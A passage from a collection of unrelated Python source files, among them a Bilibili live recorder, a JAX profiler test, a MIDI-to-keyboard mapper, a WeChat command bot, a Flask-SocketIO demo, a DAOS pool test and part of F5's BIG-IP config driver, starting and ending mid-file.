from BiliLiveRecorder import BiliLiveRecorder
from BiliVideoChecker import BiliVideoChecker
from DanmuRecorder import BiliDanmuRecorder
from Processor import Processor
from Uploader import Uploader
class MainRunner():
def __init__(self, config):
self.config = config
self.prev_live_status = False
self.current_state = Value(
'i', int(utils.state.WAITING_FOR_LIVE_START))
self.state_change_time = Value('f', time.time())
if self.config['root']['enable_baiduyun']:
from bypy import ByPy
_ = ByPy()
self.bl = BiliLive(self.config)
self.blr = None
self.bdr = None
def proc(self, config: dict, record_dir: str, danmu_path: str, current_state, state_change_time) -> None:
p = Processor(config, record_dir, danmu_path)
p.run()
if config['spec']['uploader']['record']['upload_record'] or config['spec']['uploader']['clips']['upload_clips']:
current_state.value = int(utils.state.UPLOADING_TO_BILIBILI)
state_change_time.value = time.time()
u = Uploader(p.outputs_dir, p.splits_dir, config)
d = u.upload(p.global_start)
if not config['spec']['uploader']['record']['keep_record_after_upload'] and d.get("record", None) is not None:
rc = BiliVideoChecker(d['record']['bvid'],
p.splits_dir, config)
rc.start()
if not config['spec']['uploader']['clips']['keep_clips_after_upload'] and d.get("clips", None) is not None:
cc = BiliVideoChecker(d['clips']['bvid'],
p.outputs_dir, config)
cc.start()
if config['root']['enable_baiduyun'] and config['spec']['backup']:
current_state.value = int(utils.state.UPLOADING_TO_BAIDUYUN)
state_change_time.value = time.time()
try:
from bypy import ByPy
bp = ByPy()
bp.upload(p.merged_file_path)
except Exception as e:
logging.error('Error when uploading to Baiduyun:' +
str(e)+traceback.format_exc())
if current_state.value != int(utils.state.LIVE_STARTED):
current_state.value = int(utils.state.WAITING_FOR_LIVE_START)
state_change_time.value = time.time()
def run(self):
try:
while True:
if not self.prev_live_status and self.bl.live_status:
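                    # The live stream just started: record video and danmu in two
                    # separate processes, wait for both to finish, then hand
                    # post-processing off to another process so this polling loop
                    # can resume watching for the next live session.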
start = datetime.datetime.now()
self.blr = BiliLiveRecorder(self.config, start)
self.bdr = BiliDanmuRecorder(self.config, start)
record_process = Process(
target=self.blr.run)
danmu_process = Process(
target=self.bdr.run)
danmu_process.start()
record_process.start()
self.current_state.value = int(utils.state.LIVE_STARTED)
self.state_change_time.value = time.time()
self.prev_live_status = True
record_process.join()
danmu_process.join()
self.current_state.value = int(utils.state.PROCESSING_RECORDS)
self.state_change_time.value = time.time()
self.prev_live_status = False
proc_process = Process(target=self.proc, args=(
self.config, self.blr.record_dir, self.bdr.log_filename, self.current_state, self.state_change_time))
proc_process.start()
else:
time.sleep(self.config['root']['check_interval'])
except KeyboardInterrupt:
return
except Exception as e:
logging.error('Error in Mainrunner:' +
str(e)+traceback.format_exc())
class MainThreadRunner(threading.Thread):
def __init__(self, config):
threading.Thread.__init__(self)
self.mr = MainRunner(config)
def run(self):
self.mr.run()
|
profiler_test.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import glob
import os
import shutil
import tempfile
import threading
import unittest
from absl.testing import absltest
import jax
import jax.numpy as jnp
import jax.profiler
from jax.config import config
import jax._src.test_util as jtu
try:
import portpicker
except ImportError:
portpicker = None
try:
from tensorflow.python.profiler import profiler_client
from tensorflow.python.profiler import profiler_v2 as tf_profiler
except ImportError:
profiler_client = None
tf_profiler = None
config.parse_flags_with_absl()
class ProfilerTest(unittest.TestCase):
# These tests simply test that the profiler API does not crash; they do not
# check functional correctness.
def setUp(self):
super().setUp()
self.worker_start = threading.Event()
self.profile_done = False
@unittest.skipIf(not portpicker, "Test requires portpicker")
def testStartServer(self):
port = portpicker.pick_unused_port()
jax.profiler.start_server(port=port)
del port
def testProgrammaticProfiling(self):
with tempfile.TemporaryDirectory() as tmpdir:
try:
jax.profiler.start_trace(tmpdir)
jax.pmap(lambda x: jax.lax.psum(x + 1, 'i'), axis_name='i')(
jnp.ones(jax.local_device_count()))
finally:
jax.profiler.stop_trace()
proto_path = glob.glob(os.path.join(tmpdir, "**/*.xplane.pb"),
recursive=True)
self.assertEqual(len(proto_path), 1)
with open(proto_path[0], "rb") as f:
proto = f.read()
# Sanity check that serialized proto contains host, device, and
# Python traces without deserializing.
self.assertIn(b"/host:CPU", proto)
if jtu.device_under_test() == "tpu":
self.assertIn(b"/device:TPU", proto)
self.assertIn(b"pxla.py", proto)
def testProgrammaticProfilingErrors(self):
with self.assertRaisesRegex(RuntimeError, "No profile started"):
jax.profiler.stop_trace()
try:
with tempfile.TemporaryDirectory() as tmpdir:
jax.profiler.start_trace(tmpdir)
with self.assertRaisesRegex(
RuntimeError,
"Profile has already been started. Only one profile may be run at a "
"time."):
jax.profiler.start_trace(tmpdir)
finally:
jax.profiler.stop_trace()
def testProgrammaticProfilingContextManager(self):
with tempfile.TemporaryDirectory() as tmpdir:
with jax.profiler.trace(tmpdir):
jax.pmap(lambda x: jax.lax.psum(x + 1, 'i'), axis_name='i')(
jnp.ones(jax.local_device_count()))
proto_path = glob.glob(os.path.join(tmpdir, "**/*.xplane.pb"),
recursive=True)
self.assertEqual(len(proto_path), 1)
with open(proto_path[0], "rb") as f:
proto = f.read()
# Sanity check that serialized proto contains host and device traces
# without deserializing.
self.assertIn(b"/host:CPU", proto)
if jtu.device_under_test() == "tpu":
self.assertIn(b"/device:TPU", proto)
def testTraceAnnotation(self):
x = 3
with jax.profiler.TraceAnnotation("mycontext"):
x = x + 2
def testTraceFunction(self):
@jax.profiler.annotate_function
def f(x, *, y):
return x + 2 * y
self.assertEqual(f(7, y=3), 13)
@jax.profiler.annotate_function
def f(x, *, name):
return x + 2 * len(name)
self.assertEqual(f(7, name="abc"), 13)
@partial(jax.profiler.annotate_function, name="aname")
def g(x):
return x + 2
self.assertEqual(g(7), 9)
@partial(jax.profiler.annotate_function, name="aname", akwarg="hello")
def h(x):
return x + 2
self.assertEqual(h(7), 9)
def testDeviceMemoryProfile(self):
x = jnp.ones((20,)) + 7.
self.assertIsInstance(jax.profiler.device_memory_profile(), bytes)
del x
def _check_xspace_pb_exist(self, logdir):
path = os.path.join(logdir, 'plugins', 'profile', '*', '*.xplane.pb')
self.assertEqual(1, len(glob.glob(path)),
'Expected one path match: ' + path)
@unittest.skip("Test causes OOMs")
@unittest.skipIf(not (portpicker and profiler_client and tf_profiler),
"Test requires tensorflow.profiler and portpicker")
def testSingleWorkerSamplingMode(self, delay_ms=None):
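        # One thread runs a JAX workload in a loop while another connects to the
        # profiler server and requests a 1000 ms sampled trace of it.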
def on_worker(port, worker_start):
# Must keep return value `server` around.
server = jax.profiler.start_server(port) # noqa: F841
worker_start.set()
x = jnp.ones((1000, 1000))
while True:
with jax.profiler.TraceAnnotation("atraceannotation"):
jnp.dot(x, x.T).block_until_ready()
if self.profile_done:
break
def on_profile(port, logdir, worker_start):
worker_start.wait()
options = tf_profiler.ProfilerOptions(
host_tracer_level=2,
python_tracer_level=2,
device_tracer_level=1,
delay_ms=delay_ms,
)
# Request for 1000 milliseconds of profile.
duration_ms = 1000
profiler_client.trace('localhost:{}'.format(port), logdir, duration_ms,
'', 1000, options)
self.profile_done = True
logdir = absltest.get_default_test_tmpdir()
# Remove any existing log files.
shutil.rmtree(logdir, ignore_errors=True)
port = portpicker.pick_unused_port()
thread_profiler = threading.Thread(
target=on_profile, args=(port, logdir, self.worker_start))
thread_worker = threading.Thread(
target=on_worker, args=(port, self.worker_start))
thread_worker.start()
thread_profiler.start()
thread_profiler.join()
thread_worker.join(120)
self._check_xspace_pb_exist(logdir)
if __name__ == "__main__":
absltest.main(testLoader=jtu.JaxTestLoader())
|
midiator.py
|
from midi.midi_io import find_device
from midi.midi_enums import Notes
from windows.windows_enums import KeyFlags, DICodes, MouseFlags, MouseDirections
from windows.windows_io import send_key_event, send_mouse_movement_event, send_mouse_button_event
import threading
import time
from math import sin, radians
class MIDIator:
def __init__(self, midi_identifier, key_binds, mouse_movement_binds, mouse_button_binds,
midi_channel=0, mouse_sensitivity=4, mouse_refresh=0.005, verbose=True):
"""
Constructor for MIDIator.
:param midi_identifier: A string unique to the desired MIDI device.
:param key_binds: A dictionary of the form {Notes.<note>: DICodes.<code>}.
:param mouse_movement_binds: A dictionary of the form {Notes.<note>: MouseDirections.<direction>}.
:param mouse_button_binds: A dictionary of the form
{Notes.<note>: (MouseFlags.<press-flag>, MouseFlags.<release-flag>)}.
:param midi_channel: The channel on which to listen for events (default: 0).
:param mouse_sensitivity: The amount by which to move the mouse every time mouse_refresh elapses (default: 4).
        :param mouse_refresh: The time to wait between every mouse position update (default: 5 ms).
:param verbose: Whether or not to print log messages (default: True).
"""
self.verbose = verbose
self.log("{+} Initializing MIDIator...")
self.key_binds = key_binds
self.mouse_movement_binds = mouse_movement_binds
self.mouse_button_binds = mouse_button_binds
self.log(f" > Connecting to MIDI controller by identifier \"{midi_identifier}\"... ", end="")
self.midi_port = find_device(midi_identifier)
self.midi_channel = midi_channel
self.log("Done.")
self.mouse_sensitivity = mouse_sensitivity
self.mouse_refresh = mouse_refresh
self.mouse_vector = [0, 0]
self.log(" > Initialization complete. ")
def log(self, *args, **kwargs):
"""
Prints a message to the screen if the verbose flag is set.
:param args: The args to pass down to print().
:param kwargs: The keyword arguments to pass down to print().
"""
if self.verbose:
print(*args, **kwargs)
def start(self):
"""
Starts handling MIDI messages and translating them into Windows input.
"""
self.log("{+} Spawning mouse handler thread... ", end="")
mouse_thread = threading.Thread(target=self.mouse_handler)
mouse_thread.start()
self.log("Done.")
self.log("{+} Handling MIDI events...")
for message in self.midi_port:
self.triage_message(message)
def mouse_handler(self):
"""
A function that automates moving the mouse, since each mouse movement is atomic.
"""
        sin_45 = sin(radians(45))  # sin() expects radians; 45 here is meant as degrees (~0.707)
while True:
x, y = self.mouse_vector
if abs(x) == abs(y) and x != 0:
x = x * sin_45
y = y * sin_45
x, y = int(x), int(y)
send_mouse_movement_event(x, y)
time.sleep(self.mouse_refresh)
def triage_message(self, message):
"""
Sends messages to their relevant handlers, or does nothing if irrelevant.
:param message: A MIDI message.
"""
if message.channel == self.midi_channel and "note_" in message.type:
if message.type == "note_on":
self.log(f" > Received MIDI code {message.note} ({Notes(message.note).name:3}) -> ", end="")
if message.note in self.key_binds:
self.translate_keystroke(message)
elif message.note in self.mouse_movement_binds:
self.translate_mouse_move(message)
elif message.note in self.mouse_button_binds:
self.translate_mouse_button(message)
elif message.type == "note_on":
self.log("Key not bound.")
def translate_keystroke(self, message):
"""
Triggers a keyboard event based on the contents of a MIDI message.
:param message: A "note_on" or "note_off" MIDI message.
"""
if message.type == "note_on":
self.log(f"Key {self.key_binds[message.note].name}")
direct_input_key = self.key_binds[message.note]
#flag = KeyFlags.PRESS if message.type == "note_on" else KeyFlags.RELEASE
"Extended support for devices that send note_on with 0 velocity instead of note_off"
flag = KeyFlags.PRESS if (message.type == "note_on") & (message.velocity != 0) else KeyFlags.RELEASE
send_key_event(direct_input_key, flag)
def translate_mouse_move(self, message):
"""
Modifies the mouse movement vector based on the contents of a MIDI message.
:param message: A "note_on" or "note_off" MIDI message.
"""
if message.type == "note_on":
self.log(f"Mouse {self.mouse_movement_binds[message.note].name}")
x, y = self.mouse_movement_binds[message.note]
#polarity = 1 if message.type == "note_on" else -1
"Extended support for devices that send note_on with 0 velocity instead of note_off"
polarity = 1 if (message.type == "note_on") & (message.velocity != 0) else -1
self.mouse_vector[0] += polarity * x * self.mouse_sensitivity
self.mouse_vector[1] += polarity * y * self.mouse_sensitivity
def translate_mouse_button(self, message):
"""
Triggers a mouse button event based on the contents of a MIDI message.
:param message: A "note_on" or "note_off" MIDI message.
"""
if message.type == "note_on":
self.log(f"Mouse {self.mouse_button_binds[message.note][0].name}")
click_flag, release_flag = self.mouse_button_binds[message.note]
#flag = click_flag if message.type == "note_on" else release_flag
"Extended support for devices that send note_on with 0 velocity instead of note_off"
flag = click_flag if (message.type == "note_on") & (message.velocity != 0) else release_flag
send_mouse_button_event(flag)
if __name__ == "__main__":
#####################################################
# U S E R C O N F I G U R A T I O N B E L O W #
#####################################################
# A string unique to the MIDI controller to connect to
identifier = "Digital Keyboard"
# Map from MIDI key codes to DirectInput key codes
# Note: "S" in a note name signifies "#" or "sharp"
default_key_binds = {
Notes.FS3: DICodes.W,
Notes.E3: DICodes.A,
Notes.F3: DICodes.S,
Notes.G3: DICodes.D,
Notes.D3: DICodes.LSHIFT,
Notes.A3: DICodes.SPACE,
Notes.GS3: DICodes.R
}
genshin_key_binds = {
Notes.C4: DICodes.Z,
Notes.D4: DICodes.X,
Notes.E4: DICodes.C,
Notes.F4: DICodes.V,
Notes.G4: DICodes.B,
Notes.A4: DICodes.N,
Notes.B4: DICodes.M,
Notes.C5: DICodes.A,
Notes.D5: DICodes.S,
Notes.E5: DICodes.D,
Notes.F5: DICodes.F,
Notes.G5: DICodes.G,
Notes.A5: DICodes.H,
Notes.B5: DICodes.J,
Notes.C6: DICodes.Q,
Notes.D6: DICodes.W,
Notes.E6: DICodes.E,
Notes.F6: DICodes.R,
Notes.G6: DICodes.T,
Notes.A6: DICodes.Y,
Notes.B6: DICodes.U
}
# Map from MIDI key codes to mouse movement directions
default_mouse_movement_binds = {
Notes.E4: MouseDirections.LEFT,
Notes.F4: MouseDirections.DOWN,
Notes.FS4: MouseDirections.UP,
Notes.G4: MouseDirections.RIGHT,
}
no_mouse_movement_binds = {
}
# Map from MIDI key codes to mouse button flags
# The first flag is the pressed flag, the second is the released flag
default_mouse_button_binds = {
Notes.D4: (MouseFlags.LEFT_CLICK, MouseFlags.LEFT_RELEASE),
Notes.A4: (MouseFlags.RIGHT_CLICK, MouseFlags.RIGHT_RELEASE)
}
no_mouse_button_binds = {
}
#####################################################
# E N D U S E R C O N F I G U R A T I O N #
#####################################################
# Initializing and starting MIDIator
midiator = MIDIator(identifier, genshin_key_binds, no_mouse_movement_binds, no_mouse_button_binds)
midiator.start()
|
main.py
|
import itchat
from itchat.content import *
import os
import traceback
import re
from modules.__config__ import multi_process, terminal_QR
if multi_process:
from multiprocessing import Process
else:
from modules.__stoppable__ import Process
if __name__ == "__main__":
# load modules in ./modules folder
modules = dict()
for file in os.listdir(os.path.join(os.path.dirname(__file__), 'modules')):
if file.find('__') > -1:
continue
if file.find('.py') > -1:
module_name = file.split('.')[0]
# import the main class
mod = getattr(__import__('modules.' + module_name, fromlist=['*']), module_name)
# create command key
modules[mod.alias] = mod
print(modules)
# dictionaries which store user sessions objects (interaction) and processes (static call)
session_objects = dict()
session_processes = dict()
@itchat.msg_register(TEXT)
def msg_listener(msg):
global session_objects, session_processes
# when new commands are received
cmd = msg['Text']
from_user = msg['FromUserName']
# get the user session
current_process_info = session_processes.get(from_user)
current_object = session_objects.get(from_user)
if current_process_info is not None:
if current_process_info[0].is_alive():
if cmd == '/q':
current_process_info[0].terminate()
itchat.send_msg("{} is terminated".format(current_process_info[1]), from_user)
del session_processes[from_user]
return
else:
itchat.send_msg("{} is running".format(current_process_info[1]), from_user)
return
else:
del session_processes[from_user]
# if the previous session is not ended
if current_object is not None:
if current_object.finished:
del session_objects[from_user]
else:
if current_object.msg_handler(msg):
del session_objects[from_user]
return
# if this is really a command
if cmd[:1] == "/":
if len(cmd) > 1:
# parse the command and arguments
cmd = re.split(" +", cmd[1:])
if cmd[-1] == "":
del cmd[-1]
if cmd[0] == 'help':
if len(cmd) > 1:
if cmd[1][0] == '/':
mod = modules.get(cmd[1][1:])
else:
mod = modules.get(cmd[1])
if mod is not None:
mod.help(from_user)
else:
itchat.send_msg(
"Non-existent command name " + cmd[1] + "\nType /help to see all available commands",
from_user)
else:
keys = list(modules.keys())
keys.sort()
for module_name in keys:
modules[module_name].help_brief(from_user)
itchat.send_msg("Type /help [command] to get detailed instructions on a specific command",
from_user)
elif cmd[0] in modules.keys():
if len(session_objects.keys()) + len(session_processes.keys()) > 10:
itchat.send_msg('Too many people sending commands. Please try again later.', from_user)
return
mod = modules[cmd[0]]
# interaction required -> create a new object to handle message
if mod.interactive:
try:
session_objects[from_user] = mod(from_user, mod.parse_args(from_user, cmd[1:]))
itchat.send_msg("Type /q to quit", from_user)
except Exception as e:
traceback.print_exc()
itchat.send_msg(str(e), from_user)
# no interaction -> static method call
else:
# fast_execution -> call in the main thread
if mod.fast_execution:
try:
mod.call(from_user, mod.parse_args(from_user, cmd[1:]))
except Exception as e:
traceback.print_exc()
itchat.send_msg(str(e), from_user)
                        # not fast_execution -> create a new process
else:
try:
session_processes[from_user] = [
Process(target=mod.call, args=(from_user, mod.parse_args(from_user, cmd[1:]),)),
cmd[0]]
session_processes[from_user][0].start()
itchat.send_msg("Type /q to stop", from_user)
except Exception as e:
traceback.print_exc()
itchat.send_msg(str(e), from_user)
else:
itchat.send_msg("\n".join(["Non-existent command {}".format("/" + cmd[0]),
"Type /help to see all available commands",
"Type /help [command] to get detailed instructions on a specific command"]),
from_user)
else:
itchat.send_msg("\n".join(["Error: Empty command body.",
"Type /help to see all available commands",
"Type /help [command] to get detailed instructions on a specific command"]),
from_user)
@itchat.msg_register([PICTURE, RECORDING, ATTACHMENT, VIDEO])
def file_listener(file):
global session_objects
from_user = file['FromUserName']
if session_objects.get(from_user) is not None:
if session_objects[from_user].finished or session_objects[from_user].file_handler(file):
del session_objects[from_user]
itchat.auto_login(hotReload=True, enableCmdQR=terminal_QR)
itchat.run(True)
|
run_bad.py
|
# -*- coding: utf-8 -*-
import time
from threading import Thread
from flask import Flask, request
from sio_server import socketio
from sio_client import get_ws_client
app = Flask(__name__)
socketio.init_app(app)
app.socketio = socketio
index_tmpl_str = '''
<!DOCTYPE html>
<html>
<head>
<meta charset="uff-8" />
<title>flask socketio demo</title>
</head>
<body>
<div>please watch server response at console of web browser(you can press F12)</div>
<!-- socket.io cdn -->
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/2.0.4/socket.io.slim.js"></script>
<script type="text/javascript">
var namespace = '/test';
var ws_url = [location.protocol, '//', document.domain, ':', location.port, namespace].join('');
var socket = io.connect(ws_url, {
path: '/ws/'
});
socket.on('send_log', function(message) {
console.log(message);
});
</script>
</body>
</html>
'''
@app.route("/")
def view_index():
return index_tmpl_str
def send_msg(msg):
# TODO: your code
ws_cfg = {
'host': '127.0.0.1',
'port': 5000,
'resource': 'ws'
}
ws_client = get_ws_client(ws_cfg)
print('before emit')
ws_client.emit('write_task_log', 'msg: ' + msg, path='/test')
print('after emit')
# import time; time.sleep(3)
ws_client.disconnect('/test') # specify path because of emit
@app.route("/task")
def view_task():
msg = request.values.get('msg', 'empty msg')
send_msg(msg)
return 'send task ok'
def thread_func():
print('before sleep')
for i in range(1, 6):
time.sleep(1)
print('sleep [', i, '/ 5]')
print('after sleep')
send_msg('msg')
print('after send msg')
@app.route("/thread")
def view_thread():
print('before thread')
thread = Thread(target=thread_func)
thread.start()
print('after thread')
return 'thread executed ok'
if __name__ == '__main__':
cfg = {
'host': '0.0.0.0',
'port': 5000,
'debug': True
}
print('visit by [http://{0}:{1}]'.format(cfg['host'], cfg['port']))
socketio.run(app, **cfg)
|
global_handle.py
|
#!/usr/bin/python
'''
(C) Copyright 2018-2020 Intel Corporation.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE
The Governments rights to use, modify, reproduce, release, perform, display,
or disclose this software are subject to the terms of the Apache License as
provided in Contract No. B609815.
Any reproduction of computer software, computer software documentation, or
portions thereof marked with this legend must also reproduce the markings.
'''
from __future__ import print_function
import traceback
from apricot import TestWithServers
import check_for_pool
from pydaos.raw import DaosPool, DaosContainer, DaosApiError
from test_utils_pool import TestPool
class GlobalHandle(TestWithServers):
"""
This class contains tests to verify the ability to share pool
handles among processes.
:avocado: recursive
"""
def tearDown(self):
try:
super(GlobalHandle, self).tearDown()
finally:
# really make sure everything is gone
check_for_pool.cleanup_pools(self.hostlist_servers)
def check_handle(self, buf_len, iov_len, buf, uuidstr, rank):
"""
This gets run in a child process and verifyes the global
handle can be turned into a local handle in another process.
"""
pool = DaosPool(self.context)
pool.set_uuid_str(uuidstr)
pool.set_svc(rank)
pool.group = "daos_server"
# note that the handle is stored inside the pool as well
dummy_local_handle = pool.global2local(self.context, iov_len,
buf_len, buf)
# perform some operations that will use the new handle
pool.pool_query()
container = DaosContainer(self.context)
container.create(pool.handle)
def test_global_handle(self):
"""
Test ID: DAO
Test Description: Use a pool handle in another process.
:avocado: tags=all,pool,pr,tiny,poolglobalhandle
"""
# initialize a python pool object then create the underlying
# daos storage
self.pool = TestPool(self.context, dmg_command=self.get_dmg_command())
self.pool.get_params(self)
self.pool.create()
self.pool.connect()
try:
# create a container just to make sure handle is good
self.container = DaosContainer(self.context)
self.container.create(self.pool.pool.handle)
# create a global handle
iov_len, buf_len, buf = self.pool.pool.local2global()
# this should work in the future but need on-line server addition
#arg_list = (buf_len, iov_len, buf, pool.get_uuid_str(), 0)
#p = Process(target=check_handle, args=arg_list)
#p.start()
#p.join()
# for now verifying global handle in the same process which is not
# the intended use case
self.check_handle(buf_len, iov_len, buf,
self.pool.pool.get_uuid_str(), 0)
except DaosApiError as excep:
print(excep)
print(traceback.format_exc())
self.fail("Expecting to pass but test has failed.\n")
|
bigipconfigdriver.py
|
#!/usr/bin/env python
# Copyright (c) 2016-2018, F5 Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import fcntl
import hashlib
import json
import logging
import os
import os.path
import signal
import sys
import threading
import time
import traceback
import pyinotify
from urllib.parse import urlparse
from f5_cccl.api import F5CloudServiceManager
from f5_cccl.exceptions import F5CcclError
from f5_cccl.utils.mgmt import mgmt_root
from f5_cccl.utils.profile import (delete_unused_ssl_profiles,
create_client_ssl_profile,
create_server_ssl_profile)
log = logging.getLogger(__name__)
console = logging.StreamHandler()
console.setFormatter(
logging.Formatter("[%(asctime)s %(name)s %(levelname)s] %(message)s"))
root_logger = logging.getLogger()
root_logger.addHandler(console)
class ResponseStatusFilter(logging.Filter):
def filter(self, record):
return not record.getMessage().startswith("RESPONSE::STATUS")
class CertFilter(logging.Filter):
def filter(self, record):
return "CERTIFICATE" not in record.getMessage()
class KeyFilter(logging.Filter):
def filter(self, record):
return "PRIVATE KEY" not in record.getMessage()
root_logger.addFilter(ResponseStatusFilter())
root_logger.addFilter(CertFilter())
root_logger.addFilter(KeyFilter())
DEFAULT_LOG_LEVEL = logging.INFO
DEFAULT_VERIFY_INTERVAL = 30.0
NET_SCHEMA_NAME = 'cccl-net-api-schema.yml'
class CloudServiceManager():
"""CloudServiceManager class.
Applies a configuration to a BigIP
Args:
bigip: ManagementRoot object
partition: BIG-IP partition to manage
"""
def __init__(self, bigip, partition, user_agent=None, prefix=None,
schema_path=None):
"""Initialize the CloudServiceManager object."""
self._mgmt_root = bigip
self._schema = schema_path
self._cccl = F5CloudServiceManager(
bigip,
partition,
user_agent=user_agent,
prefix=prefix,
schema_path=schema_path)
def mgmt_root(self):
""" Return the BIG-IP ManagementRoot object"""
return self._mgmt_root
def get_partition(self):
""" Return the managed partition."""
return self._cccl.get_partition()
def get_schema_type(self):
"""Return 'ltm' or 'net', based on schema type."""
if self._schema is None:
return 'ltm'
elif 'net' in self._schema:
return 'net'
def _apply_ltm_config(self, config):
"""Apply the ltm configuration to the BIG-IP.
Args:
config: BIG-IP config dict
"""
return self._cccl.apply_ltm_config(config)
def _apply_net_config(self, config):
"""Apply the net configuration to the BIG-IP."""
return self._cccl.apply_net_config(config)
def get_proxy(self):
"""Called from 'CCCL' delete_unused_ssl_profiles"""
return self._cccl.get_proxy()
class IntervalTimerError(Exception):
def __init__(self, msg):
Exception.__init__(self, msg)
class IntervalTimer(object):
def __init__(self, interval, cb):
float(interval)
if 0 >= interval:
raise IntervalTimerError("interval must be greater than 0")
if not cb or not callable(cb):
raise IntervalTimerError("cb must be callable object")
self._cb = cb
self._interval = interval
self._execution_time = 0.0
self._running = False
self._timer = None
self._lock = threading.RLock()
def _set_execution_time(self, start_time, stop_time):
if stop_time >= start_time:
self._execution_time = stop_time - start_time
else:
self._execution_time = 0.0
def _adjust_interval(self):
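        # Subtract the last callback's execution time from the nominal interval so
        # the timer fires on a roughly fixed cadence instead of drifting.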
adjusted_interval = self._interval - self._execution_time
if adjusted_interval < 0.0:
adjusted_interval = 0.0
self._execution_time = 0.0
return adjusted_interval
def _run(self):
        start_time = time.perf_counter()  # time.clock() was removed in Python 3.8
try:
self._cb()
except Exception:
log.exception('Unexpected error')
finally:
with self._lock:
                stop_time = time.perf_counter()
self._set_execution_time(start_time, stop_time)
if self._running:
self.start()
def is_running(self):
return self._running
def start(self):
with self._lock:
if self._running:
# restart timer, possibly with a new interval
self.stop()
self._timer = threading.Timer(self._adjust_interval(), self._run)
        # Timers can't be stopped; cancel just prevents the callback from
        # occurring when the timer finally expires. Making it a daemon allows
        # cancelled timers to exit eventually without a need for join.
self._timer.daemon = True
self._timer.start()
self._running = True
def stop(self):
with self._lock:
if self._running:
self._timer.cancel()
self._timer = None
self._running = False
class ConfigError(Exception):
def __init__(self, msg):
Exception.__init__(self, msg)
def create_ltm_config(partition, config):
"""Extract a BIG-IP configuration from the LTM configuration.
Args:
config: BigIP config
"""
ltm = {}
if 'resources' in config and partition in config['resources']:
ltm = config['resources'][partition]
return ltm
def create_network_config(config):
"""Extract a BIG-IP Network configuration from the network config.
Args:
config: BigIP config which contains vxlan defs
"""
net = {}
if 'vxlan-fdb' in config:
net['userFdbTunnels'] = [config['vxlan-fdb']]
if ('vxlan-arp' in config and 'arps' in config['vxlan-arp']
and config['vxlan-arp']['arps'] is not None):
net['arps'] = config['vxlan-arp']['arps']
log.debug("NET Config: %s", json.dumps(net))
return net
def _create_custom_profiles(mgmt, partition, custom_profiles):
incomplete = 0
# Server profiles may reference a CA cert in another server profile.
# These need to be loaded first.
for profile in custom_profiles:
caFile = profile.get('caFile', '')
if profile['context'] == 'serverside' and caFile == "self":
incomplete += create_server_ssl_profile(mgmt, partition, profile)
for profile in custom_profiles:
if profile['context'] == 'clientside':
incomplete += create_client_ssl_profile(mgmt, partition, profile)
elif profile['context'] == 'serverside':
caFile = profile.get('caFile', '')
if caFile != "self":
incomplete += create_server_ssl_profile(
mgmt, partition, profile)
else:
log.error(
"Only client or server custom profiles are supported.")
return incomplete
def _delete_unused_ssl_profiles(mgr, partition, config):
return delete_unused_ssl_profiles(mgr, partition, config)
class ConfigHandler():
def __init__(self, config_file, managers, verify_interval):
self._config_file = config_file
self._managers = managers
self._condition = threading.Condition()
self._thread = threading.Thread(target=self._do_reset)
self._pending_reset = False
self._stop = False
self._backoff_time = 1
self._backoff_timer = None
self._max_backoff_time = 128
self._verify_interval = verify_interval
self._interval = IntervalTimer(self._verify_interval,
self.notify_reset)
self._thread.start()
def stop(self):
self._condition.acquire()
self._stop = True
self._condition.notify()
self._condition.release()
if self._backoff_timer is not None:
self.cleanup_backoff()
def notify_reset(self):
self._condition.acquire()
self._pending_reset = True
self._condition.notify()
self._condition.release()
def _do_reset(self):
log.debug('config handler thread start')
with self._condition:
while True:
self._condition.acquire()
if not self._pending_reset and not self._stop:
self._condition.wait()
log.debug('config handler woken for reset')
self._pending_reset = False
self._condition.release()
if self._stop:
log.info('stopping config handler')
if self._backoff_timer is not None:
self.cleanup_backoff()
break
start_time = time.time()
incomplete = 0
try:
config = _parse_config(self._config_file)
# If LTM is not disabled and
# No 'resources' indicates that the controller is not
# yet ready -- it does not mean to apply an empty config
if not _is_ltm_disabled(config) and \
'resources' not in config:
continue
incomplete = self._update_cccl(config)
except ValueError:
formatted_lines = traceback.format_exc().splitlines()
last_line = formatted_lines[-1]
log.error('Failed to process the config file {} ({})'
.format(self._config_file, last_line))
incomplete = 1
except Exception:
log.exception('Unexpected error')
incomplete = 1
if incomplete:
# Error occurred, perform retries
self.handle_backoff()
else:
if (self._interval and self._interval.is_running()
is False):
self._interval.start()
self._backoff_time = 1
if self._backoff_timer is not None:
self.cleanup_backoff()
perf_enable = os.environ.get('SCALE_PERF_ENABLE')
if perf_enable: # pragma: no cover
test_data = {}
app_count = 0
backend_count = 0
for service in config['resources']['test'][
'virtualServers']:
app_count += 1
backends = 0
for pool in config['resources']['test']['pools']:
if service['name'] in pool['name']:
backends = len(pool['members'])
break
test_data[service['name']] = backends
backend_count += backends
test_data['Total_Services'] = app_count
test_data['Total_Backends'] = backend_count
test_data['Time'] = time.time()
json_data = json.dumps(test_data)
log.info('SCALE_PERF: Test data: %s',
json_data)
log.debug('updating tasks finished, took %s seconds',
time.time() - start_time)
if self._interval:
self._interval.stop()
def _update_cccl(self, config):
_handle_vxlan_config(config)
cfg_net = create_network_config(config)
incomplete = 0
for mgr in self._managers:
partition = mgr.get_partition()
cfg_ltm = create_ltm_config(partition, config)
try:
# Manually create custom profiles;
# CCCL doesn't yet do this
if 'customProfiles' in cfg_ltm and \
